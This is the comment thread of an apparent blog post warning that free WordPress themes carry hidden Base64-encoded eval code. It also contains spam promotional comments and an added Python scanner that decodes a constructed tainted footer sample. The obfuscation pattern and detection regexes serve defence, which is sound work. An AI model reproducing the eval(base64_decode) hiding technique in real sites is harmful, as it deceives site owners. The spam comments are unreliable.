Pingback: Avoid Themes That Have Evil Codes | Fazreen
Pingback: Premium WordPress Themes Are Not All The Same
Pingback: Kennt sich wer mit WordPress-Themes aus? - Delphi-PRAXiS
Hey thanks for this posts. I’m myself a beginner in blogging but these tips can be vital to me in doing my job well.
Nice themes! If you want a bigger selection to choose from visit http://www.chrome-theme.org to grab all kinds of hd google backgrounds!
Pingback: Quora
I came across this article from SeoBook. It’s a nice way to warn people to check the ‘free themes’ they download from internet. Of course, many will say: Why spend 80 bucks on a theme when I can find it for free ? Well, your post answered the question.
PS: I re-tweet your post and followed you on twitter :P
Yeah, I have run into this stuff before. I downloaded 1 free theme in my life and I never downloaded a free theme again after that.
My theme (like all of the above mentioned) had Base64 code in it for tons of backlinks and such. Also, like a few of the themes encountered above, I was warned not to remove the code or my site would not work. I know my way around HTML and basic PHP, and I figured this was not possible. Long story short, it completely disabled my site. You got a blank white page when you visited the site when the code was deleted. I restored the malicious code to my site and the site again worked. I also had so many problems with unsupported basic features and missing files that I spent so much time fixing it that I think I should have made one myself.
Stay away from these free templates. There are theme shops out there like http://www.themeforest.net that offer exceptional quality themes for $20-$30. That’s not too much to ask, and they’re supported ongoing with updates. It’s the best way to go. Just look at that $20 as a cost of the blog, like your hosting is $10 a month.
Scary stuff. Thanks for the post.
Pingback: Strona | Belgron
Hello Siobhan Ambrose, I must say, “This is the most authoritative breakdown and expose of the FREE WP Theme issue that I’ve ever read!” I’m sending the link to my IM partner to see if he will write a response and post this to his Blog Help website. We’ve seen this discussion on the Warrior Forum and other IM forums and most bloggers just don’t get it until its too late. Thanks for taking the time to open our eyes!
Oh, and to repeat; if you are downloading these free WP Themes from anywhere but the actual WordPress website, you are BEGGING for a virus, malware or some other type of malicious script.
Great info! Also please avoid downloading the free revelotion lifestyle church theme. I found a hidden link with different characters leading to adult sites. If you happen to download this theme, check your folder wp-content/themes/church-40/ and look for archive.php. There will be a message “<?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */” – just delete the code under it. You may also try the online outbound link tool. Just search Google to see if you have hidden links to spam sites.
Pingback: Webbdesign-länktips – vecka 7 | Kim Göransson
Thank you so much for taking the time to write this amazing article! I have a friend who wants to convert her static website to WordPress and this article was the first thing I sent her in her quest to find the perfect theme.
You rock!
I recently created a post on 45 Free WordPress themes, the post was highlighted on reddit with a comment about TAC and a link to this page.
Whilst I sifted through your post (again thanks for highlighting TAC) I realised that I was potentially allowing people to download themes that may have some form of back links or indeed encrypted code.
So as a result I went through the post and tested all 45 on my local install. I then posted the results on my blog underneath each theme to give readers insight into what they would be getting; to say the results were surprising would be an understatement.
The post can be viewed here http://fuzzly.co.uk/i-got-45-problems-but-a-wordpress-theme-aint-one/ you will note when viewing I have tried to be as transparent as possible about the dangers of each theme.
I wanted to thank you for taking the time to write up on WordPress Theme Authenticity as I believe it is massively overlooked.
Hopefully we will start a trend and all future WordPress theme collections will have this report in them, who knows maybe we have started a trend!
What an eye opening article! I never realized there were “dirty” themes. My site’s been down for months and after reading this, I installed the site and theme on my local machine with the suggested plugins and lo and behold, base64 was there. Live and learn.
Pingback: Never Search For Free WordPress Themes in Google or Anywhere Else ~ Ahmad Saiful Muhajir | another viewpoint
Thanks for the article.
I always do a code clean-up before installing a theme, it’s also fun to discover the techniques used by dumbasses to hide their crap :)
Pingback: Too many hours, not enough time
I’m kinda in shock, why would anyone want to do this?
This is a really great post, I can see you’ve spent a lot of time on it.
Thank you
Pingback: Shoestring Budget SEO Tips for Small Businesses | Scottsdale Professional SEO Company
Pingback: How Social Media Changes Everything* | Scottsdale Professional SEO Company
Exploit Scanner is a fantastic plugin and I’ve used it to locate all the bad stuff in some of my free themes. You did a fantastic job on this, and I’m glad to see this post going viral. I had one site with a free theme that would play music out of the clear blue and redirect to some Chinese site at random. When I ran Exploit Scanner I found out why – full of bad stuff. Thanks for giving so many people a heads up on this.
Pingback: Webmarketing pour poulpe » Blog Archive » Pas d’inspiration pour le netlinking ? Le poulpe et son neurone vont vous sauver !
Excellent post. I wish you write something about Wp scam plugins out there sometimes.
Thanks it was a good read.
Pingback: Aufgepasst bei Wordpress-Themes! « Drop the thought
Great post. Everyone needs to be aware of this. Thanks.
Pingback: Watch Out For FREE Themes, You Could Be Getting More Than You Expected | WordPress Tips from Chuck Jines,Chicago SEO
Totally agree.
I’ve had several problems with themes with inappropriate links embedded in them.
Why saddle every page you will ever write with off-topic links…..
Better to find a stripped down free theme from WordPress and develop some child themes around it yourself.
Pingback: Low Quality Google Search Results | Sphaerula
Thank you for a great post. Thankfully I have never used a free WordPress theme, and your great post has told me why! Many premium WordPress themes are very cheap, which still means it’s pretty cheap to get a decent website running with WordPress. A couple of premium providers that don’t cost the earth are ithemes.com, elegantthemes.com, and templatesold.com. I’ll probably run Theme Authenticity Checker through a few of them though!
Hi Shiobhan,
Thanks for a brilliant article, whilst I am doing housekeeping on my blog after upgrading to WP3 this is another aspect to look into.
Two years online I have never even heard this being discussed anywhere else before! Keep up with the excellent topics.
Pingback: Choosing a Wordpress theme: What your web site can look like-YourOnlineVisibility - YourOnlineVisibility
Pingback: Looking for wordpress theme for video game deals - The Wholesale Forums
SO true!
We built a WP themes search engine and we curate only the best quality WP themes, free and commercial as well: http://qualithemes.com/
Thx!
Thank you so much for showing this fact..
really very helpful for beginners who always try to find themes from google etc..
thanks again !
Pingback: 10 WordPress Themes Ideal for Yoga Studios & Teachers
Pingback: Comment trouver des thèmes WordPress gratuits et premium - SuperThemes
You saved a lot of users with this article. You actually put a lot of work into each and every site. 8/10 (and the only good one is WordPress’ official site!, WOW) is scary.
Pingback: Shoestring Budget SEO Tips for Small Businesses
Pingback: Get Your New WordPress Blog Indexed In 24 Hours [checklist] | Search Engine People | Toronto
Thanks for article. Your site is very interesting
Pingback: Все еще ищете бесплатные темы для WordPress? | Сайт, форум, блог
Pingback: Technobyte » How Social Media Changes Everything*
Thanx for the warning. Usually I hunt for WP themes to install them onto Textpattern. Just HTML and CSS, nevertheless…
Excellent analysis and quite an eye-opener! Thanx for all your hard work and the resources! I’ve already implemented some of them. You can never be too careful these days!
Pingback: Niebezpieczny kod w szablonach | Witaj
You can use Exploit Scanner to check the theme for bad stuff.
You can use the Exploit Scanner to check your theme.
Wow! I had no idea all those “free” content sites were so dangerous. I plan on reading a lot more of your articles. I kind of feel like the naive red riding hood talking to the wolf in the woods without a clue of his evil intentions. Talk about a wake up call. Thanks!
Pingback: Themes and Plugins for Class Sites – ITCP Core 2 Spring 2011
super themes, thanks (like)!
Congratulations Siobhan,
No doubt it is clever research and an excellent article, thanks for sharing!
Hi,
I am completely new to this, just setting up my first website, and you saved me from selecting a free theme found on such dodgy sites! I am not a coding techy so I am very grateful for this information.
Thank you:)
Pingback: White Hat SEO: It F@$#ing works | Affiliateswizard
Pingback: White Hat SEO: It F@$#ing works | NexGen SEM
Pingback: White Hat SEO: It F@$#ing Works | SEO Freelancer Hyderabad
Pingback: White Hat SEO: It F@$#ing Works | Visibility Revolution
Thanks for such a detailed, clear and well-researched post, Siobhan. I’m glad I use one of the Woo Themes on my site. I’ll check out your other sources for trusted themes, as well as the plugins you recommended. Sometimes my clients find themes on their own, and you’ve greatly improved my toolbox when it comes to checking them out.
Pingback: Cuidado com templates grátis de Wordpress. | Programador de Allstar!!!
Pingback: Segurança do Wordpress » Márcio Francisco Dutra e Campos -
Pingback: Why you should never search for a free WordPress theme
Pingback: White Hat SEO: It F@$#ing Works | SEO Basics
Pingback: Best host for Wordpress sites (security & performance) - SitePoint Forums
I always assumed that all free templates included links for SEO purposes. I’m ok with that. The real issue is that you open up other possible exploits with JS and who knows what else. Injecting links is one thing, but once someone figures out how to use these for spreading malware look out. What percentage of WP users use these themes, I would imagine it’s a large number.
Great post! There are definitely some nasty little buggers out there waiting to take advantage of the unlikely coder.
Thank you so much for this .. of course I found it by typing in free wordpress themes but shall be looking elsewhere now. Great job.
Fantastic insight into these WP theme websites ranking at the top of Google; these should be penalised and banished from the SERPs purely for your findings alone.
Thanks for taking the time to write such a detailed article accompanied with code snippets and screenshots – will definitely be avoiding these sites for themes in future and will always ensure I check for this encrypted code/Base 64 in future.
Pingback: Hi All, I have been hacked! - Niche Choppers VIP Earners Club
perfect article thanks for your work and sharing
Pingback: Why “free wordpress themes” are dangerous? |
Pingback: Warez Sites: The Phantom Menace - OddMag
Pingback: Straight to the Source: 100 Fresh and Free WordPress Themes | WordPress News at WPMU.org
Of course with the new Panda updates the value of backlinking like this has been seriously undermined anyway. Not taking anything away from the malicious nature of arbitrary code being injected into the theme of your site. It only takes one unscrupulous advertiser and before you know it you’re having your site infected with iframe-based malware popups and all sorts. Scary stuff. But hopefully, with diminishing returns now the alarm has been sounded…
Pingback: SFCite | Blog | Straight to the Source: 100 Fresh and Free WordPress Themes
Pingback: Straight to the Source: 100 Fresh and Free WordPress Themes | Multidots Solutions
Pingback: Making the most out of your Wordpress blog | Acute New Media
I don’t know how much Google’s Panda helped.
A “free wordpress themes” search does now show wordpress.org at the top. I suppose that helps some.
But the second result is STILL WordPress Themes Base (#1 on this post), where I downloaded a random theme, looked in the footer and…
“<?php eval(base64_decode…”
So, they haven’t cleaned up their act, and Google still has them as #2.
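The footer tip earlier in the comments and the `eval(base64_decode…` line above both come down to one check: decode the wrapped string without ever running it, then look at what it prints. This added example (not from the post or any commenter) does that statically in Python over a constructed footer.php fragment; the `example.invalid` URLs are placeholders.

```python
"""Static scanner for eval(base64_decode(...)) payloads in WordPress theme files.

Added example, not part of the original post. It decodes the hidden string
offline and lists the links it contains, so the theme is never executed on a
live server. SAMPLE_FOOTER below is constructed for this example.
"""
import base64
import re

# eval(base64_decode("...")) / eval(base64_decode('...')), the shape seen in
# the tainted footers discussed above; tolerant of whitespace and case.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)
# Any other eval( call is still worth a manual look, even without Base64.
BARE_EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)
HREF_RE = re.compile(r"href\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def decode_payloads(php_source: str) -> list[str]:
    """Return the decoded text of every eval(base64_decode(...)) call found."""
    decoded = []
    for _quote, blob in EVAL_B64_RE.findall(php_source):
        raw = base64.b64decode(re.sub(r"\s+", "", blob))
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def hidden_links(php_source: str) -> list[str]:
    """List href targets that only exist inside Base64-wrapped eval payloads."""
    links = []
    for text in decode_payloads(php_source):
        links.extend(HREF_RE.findall(text))
    return links


def scan(php_source: str) -> dict:
    """Summarise one file: bare eval() count, decoded payloads, hidden links."""
    return {
        "eval_calls": len(BARE_EVAL_RE.findall(php_source)),
        "base64_payloads": len(decode_payloads(php_source)),
        "hidden_links": hidden_links(php_source),
    }


# Constructed footer.php fragment standing in for a tainted theme footer.
# The payload is built here so the sample is readable; a real theme ships
# only the opaque Base64 string.
_HIDDEN_HTML = (
    '<div id="credits">Powered by WordPress | '
    '<a href="http://spam-one.example.invalid/">cheap loans</a> | '
    '<a href="http://spam-two.example.invalid/">casino</a></div>'
)
_PAYLOAD_PHP = "echo '" + _HIDDEN_HTML + "';"
SAMPLE_FOOTER = (
    "</div>\n"
    "<?php /* WARNING: This file is protected by copyright law. */\n"
    "eval(base64_decode('"
    + base64.b64encode(_PAYLOAD_PHP.encode()).decode()
    + "'));\n"
    "?>\n"
    "<?php wp_footer(); ?>\n</body></html>\n"
)

if __name__ == "__main__":
    report = scan(SAMPLE_FOOTER)
    print(f"eval() calls: {report['eval_calls']}")
    print(f"Base64 payloads decoded: {report['base64_payloads']}")
    for url in report["hidden_links"]:
        print("hidden link:", url)
```

Point `scan()` at the text of each PHP file in a downloaded theme before activating it; anything with a non-zero `eval_calls` deserves a look even when no Base64 payload decodes.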
Pingback: A Important Info About Your Wordpress Theme | Here I Am...
Pingback: An Important Info About Your Wordpress Theme | Here I Am...
Pingback: Friday Night Links: Easter Edition | Single Grain Blog
I’ve been a blogger for 2 years but never found such honest and mind-blowing research. Even my grandkids will remain thankful to you.
http://www.saabwagon.com/ is my non-profit Saab fan blog.
Pingback: The risks of FREE Software | For Mac & PC repair, you know where!
Thanks for all of your hardwork.
Excellent article
Pingback: Startling Stories » Content Theft and Added Malware
Very nice sleuthing! Nothing in life is really free and sometimes we pay in ways that we hadn’t planned.
Pingback: wpmag.com - WordPress News, Themes, Tutorials, Plugins, Questions, ...
Pingback: Por qué nunca deberías buscar "Free WordPress Themes" en Google [ENG]
I noticed a lot of hidden links in some free themes sometimes. What does it mean if you have the word “eval” in the code? I couldn’t work it out from the post, sorry.
Thanks for the tips, I have been using free templates for a while and didn’t know about the encoded links. I just checked my theme out, and sure enough, I have them on my site as well. Time to upgrade and buy a new template!
Great, I never realized that they could use coded links…
Thanks for sharing
These are great WordPress resources – I actually just started digging into a really really solid book on WordPress 3.0. It’s got some really nice code samples, and is written by a few pro WordPress developers (including some from Envato). I’m actually giving away 2 copies of the e-book on my site – check out the details about the e-book and the giveaway here – I think you’ll dig it : http://bit.ly/lq20Ff
There is clearly a lot to know about this. I think you made some very good factors in Functions also.
Keep working , wonderful position!
Pingback: 移除Magpress主题的footer链接看wordpress免费主题安全性 | ~SolagirL~
Pingback: Kosten (maatwerk) WordPress themes | Hiranthi's weblog - Weblog van een ondernemende vrouw
Pingback: Heu… vraiment? | Pimsland*2011
Thank you a lot for this very interesting post.
I’ll be more careful now with free theme.
Pingback: Uma questão de temática | WP & etc
Pingback: Important Sites | SBH World Blog
It’s really hard work done. I was wanting to write such an informative article about free themes; thank you, you did. I am going to link this article to my post with an intro. Keep it up…
This is one of the helpful articles I’ve read, I never thought this could happen. Thanks.
Pingback: De pe Blogger pe Wordpress | Tătar Iulian
Yes, you are right. Most of the time beginners fall for this type of theme: they just want a good-looking theme, and do not consider this type of code or links, or sometimes do not bother what to look for in a theme or what functionality is offered by the theme.
Overall a well-researched article for beginners. Those who know a little bit of PHP and CSS can solve these little problems.
Pingback: Genesis Framework WordPress Theme Review: Is It Good?
Great post. So many folks just install themes and hope for the best. It’s sad that people put so much junk out there. I feel bad for those that get nailed by stuff like this.
Pingback: A Free wordpress newsletter » From WordPress Beginner To Blogging Rockstar: 28 Awesome Tips
Pingback: How to Make Money with WordPress - Page 2
Pingback: Tips Tuesday and How to Design a Website
Very long and useful post, you spent lots of time doing this research and the result is amazing, thank you
While I like your research, I have found one of your recommended sites, Theme Hybrid, to be suspect. I have downloaded themes from there that appear to have some serious problems. I am still doing my research, but please review.
Pingback: How to use WordPress as a basic CMS | BLOGSPOT TEMPLATES
Pingback: How to use WordPress as a basic CMS | WORDPRESS PORTAL
Good to have discussions about the pros and cons of WordPress… once we know the complete picture it is better and easier to make the decision. It is lovely guidance for beginners too.
I like your research, I have found one of your recommended sites theme hybrid to be suspect
Pingback: Is your WP theme safe? - Webmaster Forum
Pingback: 101 Essential Free WordPress Resources for Building Your WordPress Website
Some excellent advice from Siobhan Ambrose on how to check for hidden code within free WordPress themes found on Google and other sites.
Pingback: Free Wordpress Themes - All Bad for SEO?
If my app/code/theme/script is so good… why do I have to lie/trick people into actually using it?
If it was THAT good… wouldn’t everyone WANT to use it?
Thank you so much for this information. It is really nice to have people like you who can tell people like me who don’t know much about these things about what could happen.
Pingback: Introducing Words for WP: A Copywriting Service for the WordPress Community
Pingback: Introducing Words for WP: A Copywriting Service for the WordPress Community | SNS Online
Pingback: Introducing Words for WP: A Copywriting Service for the WordPress Community | Vosoughi
Pingback: wp-coder.net » Introducing Words for WP: A Copywriting Service for the WordPress Community
Pingback: A Free wordpress newsletter » Introducing Words for WP: A Copywriting Service for the WordPress Community
Pingback: WordPress themes: free vs premium vs custom made - WOOpress
Pingback: Free WordPress Themes Often Contain Hidden Dangers | WDTalk
Pingback: 10 Reasons to Purchase the Premium WordPress Theme Headway Right NOW! | Gadarian Digital
My brother suggested I may like this blog. He was entirely right. This put up actually made my day. You can not consider just how so much time I had spent for this information! Thanks!
Pingback: Amoeba Solution Kiosk » Free WordPress themes and Malicious/Devil Codes
Pingback: WordPress Security Plugins 2011
Pingback: Legally Sell or Giveaway PREMIUM WordPress Themes - Comes with Over $1000 Worth of PREMIUM Themes | Domaining Diva
Pingback: Legally Sell or Giveaway PREMIUM WordPress Themes – Comes with Over $1000 Worth of PREMIUM Themes | BullFlip - Website Flipping
Good article. Need to be more careful with these themes now.
I am a newbie at wordpress, setting up wp websites for friends and family. Inasmuch as most of the sites I set up are on a budget, we use free wp themes on all of them. I was utterly aghast at your findings, and to think that I just click on those top serp sites and download the free themes assuming that their makers are cool honest guys.
Now, I have some tools to use to check these themes. The TAC tool, however, seems not to have been updated since 2009.
I have already come across several sites which do the same. In most cases, I avoid using those themes. Merely glancing at the footer.php gives you an idea of how bad these themes could be. Avoid Avoid Avoid
Pingback: 10 Beautiful Premium WordPress Portfolio Themes | WPin.me
Pingback: testing | SRP Archives
Pingback: Cuidado Con Algunos Temas Wordpress
Wow, this is a scary article, but essential reading. I didn’t realise so many free theme sites were adding rogue code to their themes. I’ve just downloaded the Arras theme (minus Tim Thumb to avoid the vulnerability issue) and will give it a test run to see if it can replace some of the themes we’re using. Thanks for all the excellent information.
Pingback: Making the most out of your Wordpress blog – Your Social Media Ninja
Pingback: My Migration from Blogger to WordPress | Blog of Digilodger
Pingback: Why You Should Never Search For Free WordPress Themes in Google… » JackyFain.com
No matter how many times I come across your it never gets old. You definitely hit the trend of fashion and latest style
Pingback: Looking for a FREE WordPress theme? Be careful out there! | Bobwp
Pingback: 11 of WPMU’s Top WordPress Posts From 2011
Pingback: Why You Should Never Search For Free WordPress Themes in Google… | The Web Hen
Another theme that has malware on it is Groove Bordeaux. I downloaded it because I liked the look but when I did I ended up with my sites being hacked. I was able to go through the code and clean it up.. but definitely one to stay away from too.
Cheers
John
Great work Siobhan. I don’t know if this was pointed out by your other commenters, but the globalEval code caught by Exploit Scanner is likely just a bit of harmless jquery. Not sure why Exploit Scanner is chucking a wobbly over that, it’s found in every installation of wordpress that uses jquery. You can see the exact same verbiage yourself by doing a test search of any local or server copy of jquery.js
Thanks for turning us on to some great tools, too!
Well, OK. I have to say, what a wonderful it is. Thank you for sharing so good in the website. I like it very much.
This post really goes the extra mile when delivering what people need to hear. Thank you for posting this :)
Hi… I read the post and liked it very much; it was also very helpful.. but tell me, what is ‘TAC’? Is it a plugin???
Then from where can I get it??
Please reply!
Pingback: There is no such thing as a free….. | ZOAH
Thank you for posting this.
How about this site? Is it safe? http://fthemes.com/
Pingback: Good content trumps SEO… I beg to differ, try putting...
Pingback: Good content trumps SEO… I beg to differ, try putting WordPress in your domain name! | Vosoughi
Pingback: wp-coder.net » Good content trumps SEO… I beg to differ, try putting WordPress in your domain name!
Pingback: Good content trumps SEO… I beg to differ, try putting WordPress in your domain name! | SNS Online
Pingback: A Free wordpress newsletter » Good content trumps SEO… I beg to differ, try putting WordPress in your domain name!
Pingback: Hacked Wordpress Sites
Pingback: How Safe Are Free Wordpress Themes | Trish Mullen | Integrating Personal Development with Internet Marketing
Great work Siobhan, I am happy I found this post. I tweeted and I follow you. I am a newbie, just a month old. The other day, when I analysed my site with a tool I found some links with which I was not familiar. I was suspecting something, but I could not find where they were coming from. Now I know. Thanks, great info.
Hello there. I found your weblog using msn. That is an extremely well written article. I’ll be sure to bookmark it and return to read more of your helpful info. Thank you for the post. I’ll certainly come back.
Pingback: Install WordPress Theme | How to Install WordPress Theme in Three Steps!
Thanks for taking out the time to inform. Very useful article, but a bit scary, too!
Oh good god, my boss makes me use “Gameliso” and the site is live. What should I do…..
Thanks, I’ve just been searching for information about this subject for a while and yours is the greatest I have discovered so far. However, what concerning the conclusion? Are you positive concerning the supply? | What I do not realize is in fact how you are not actually a lot more neatly-appreciated than you might be right now. You are very intelligent.
Great post, very informative. I ponder why the opposite specialists of this sector don’t realize this. You should continue your writing. I am confident you’ve a great readers’ base already! | What’s taking place? I’m new to this, I stumbled upon this and I have discovered it positively helpful and it has helped me out loads. I hope to contribute & help other customers like it’s helped me. Great job.
Heya, I’m here for the first time. I came across this board and I find it really useful & it helped me out a lot. I’m hoping to offer something back and aid others such as you aided me.
I’d like to point out that generally I would agree with the sentiment of your article in regards to free WP Themes (I hate encrypted ones). That is why we devoted our site to the best in free wp themes (non-encrypted). Check it out if you have the time. It will be worth it!!
Themes with encrypted code usually have all kind of fancy features, slider, outstanding design etc. This code simply is meant to have those commercial links not removed. Agreed, themes have to be thoroughly checked before going to your server.
On the other side, if you buy a premium theme, things are also complex. Many premium themes load awfully slow. Constant WordPress updates require you to also have your theme upgraded, but who guarantees that? Premium themes are rarely tested on all different types of servers, surely a risk factor. Many WordPress users meanwhile have thousands of articles/comments. To buy a premium theme and then to find out that the pics of all your 5000 posts are not activated as featured images with the proper size and therefore don’t show up in the newly bought premium theme is another obstacle. So yes, agreed, the temptation to carelessly try out “free themes” is there.
Pingback: free wordpress article directory theme - Autoblogging in Action
Very informative blog. I haven’t used WordPress yet but I was very keen on learning about it. I always search on Google and it scared me upon learning that these top search engines might contain malware. Thank you for sharing, most specially guiding us where to find free WordPress themes which is safe. Brilliant post!
Excellent items from you, man. I remember your stuff from before and you are simply extremely great. I really like what you have got right here, certainly like what you are saying and the way in which you are saying it. You are making it entertaining and you continue to take care to stay smart. I can’t wait to read much more from you. That is actually a tremendous website.
Pingback: Wordpress News - Why WordPress?Wordpress News
Pingback: Why FREE themes aren't always good | WP for Biz
Thank you for giving me information where to find WordPress without being scared I might stumble on malware. I’m just so glad I came across this blog, very helpful really. I have always depended on Google for years, so I am surprised at these top search engines containing malware. Thanks again!
It’s actually a great and helpful piece of info. I am satisfied that you simply shared this useful information with us. Please keep us informed like this. Thank you for sharing.
Thank you for giving me information. It’s actually a great and helpful piece of info.
My brother recommended I would possibly like this website. He was entirely right. This submission truly made my day. You can’t believe just how much time I had spent on this info! Thank you!
Pingback: Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress Francophone | ZeeWebON
Scary to know about this, especially with content you trust and then something bad happens. You awakened my eyes. Keep up the good work
Pingback: VTCTA WordPress 101 | VTCTA
It is in reality a nice and useful piece of information. I am happy that you just shared this useful information with us. Please stay us up to date like this. Thanks for sharing.
Pingback: Free or Paid Theme: Should I Get a Free Theme? NO! | Wordpress Noobies
Pingback: - ThreatResearcher ... a blog
Nice weblog here! Additionally, your web site loads up fast! What web host are you using? Can I get your affiliate link for your host? I desire my website to load up as quickly as yours lol
Pingback: We Need A Theme! | ALBC Testing Grouds
Yes. You are right, I always check with the plugin when I install a new free WordPress theme for my blog.
Pingback: Friday Featured Posts About Blogging & Social Media - Simply Stacie
Pingback: Keep Calm and Carry On: How To Handle 4 Common WordPress Emergencies
Pingback: Choosing a Wordpress theme: What your web site can look like - Your Online Visibility || Your Online Visibility
Do not trust TAC : http://www.boiteaweb.fr/security-plugin-review-tac-theme-authenticity-checker-3149.html (french post sorry)
Pingback: More Themes | wordpressonlineinaday.com
Pingback: Gevonden (weekly) « Anybody seen my
Pingback: Blog Design On A Budget: The Complete Guide For Creating A Beautiful, High Converting Blog
WordPress sucks. Learn how to program
Obviously over 22% (and growing daily) of all of the website owners and corporations in the world including (just to name a few) CNN, Yahoo, Harvard, NASA, FOX, The New York Times, Flickr, Rolling Stone, Meebo, C|net, Le Monde, Nancy Pelosi, Rosie O’Donnell, Stephen Colbert, Anousheh Ansari, Stanford, MIT, Second Life, Xerox, The US Post Office, Ford Motors….disagree with you.
They aren’t using “programmers” they are using WordPress Developers. You need to add some skills to your resume my friend. The web is passing you by.
Pingback: What Are Themes, Frameworks, and Plugins? | The High-Tech Coach
Thank you for all the effort you’ve put into the investigation and the article, even though I just found it now. I was aware of all those things prior to reading your article, but I was doing all the checking for base64 and unwanted links by hand. Thanks to you, I found about TAC and I just ran all the free themes I’m using for the sites I run or manage through it. It saves a lot of time and effort! Thankfully, I have developed my own theme for my personal website, so no need to worry about it :) I would recommend that to everybody who has the knowledge and skill, and of course – the time!
Thank you again for pointing that great plugin out for me :)
This has great information for learning. A new online magazine FLORIDA STANDARD has been published. It has all content of our life style and also has up-to-date event & information that can increase our knowledge. Here’s the link. I think this magazine will be helpful for you.
http://www.TheFloridaStandard.com
Very interesting article. I think I need to check everything once again. Thanks for your information, keep writing. http://www.couponcodesindia.com/diythemes.com/
Hello, I just wanna ask if you could provide a code that will trim and show only the text between theText Here .. also, a code that will show the text which begins with the word ‘Price’
e.g.: post text… Price: $23.99…text text…
the output will be $23.99
Thanks in advance, cheers!
hallo:)
I have just started up my own website, and until now I have only installed plugins (Antivirus, BPS, Exploit Scanner, Secure WordPress, TAC and WP-Malwatch) to secure my site. When I scan with Exploit Scanner it shows me 16 level severes? e.g. located in plugins: Antivirus and WP-Malwatch and Secure WordPress. In these it shows base64 and eval.. how can that be possible? Are these plugins not secure to use?
Hope someone can help me :)
Wow, and this is why you do NOT hunt down for free wordpress themes on Google.
I hope more people actually knew how much they are compromising their server’s security, but people seem not to care.
Sergio
This valuable information came at just the right time! I have 2 questions…. First, I tried to duplicate what you did and I was never able to get the encrypted code I found using TAC and Otto’s decoder to decode into anything intelligible. I can’t figure out how to select the proper snippet, I think.
Second and most important…I have a site with a free theme and I found a lot of embedded base64 code. If I install a clean theme, will my site then go on to recover from the SEO damage done?
Woot … I didn’t know the history behind it … I have uploaded a free theme to http://thetrafficbus.com/. Can I also get these kinds of problems …?
WOW!! This article is really full of great info.
Thank you for all of your time searching.
I just found your site with this page. Absolutely loved it. Bookmarking it right away.
Great insights into the search term. I’ll be sure to watch out for these now. Thanks a lot
Nice work with all the detail.
But who doesn’t already know this information.
None of this is malicious nor harmful, you just hated on some websites because it’s trendy to diss free WP themes.
Remove Text Enhance
http://botcrawl.com/how-to-remove-text-enhance/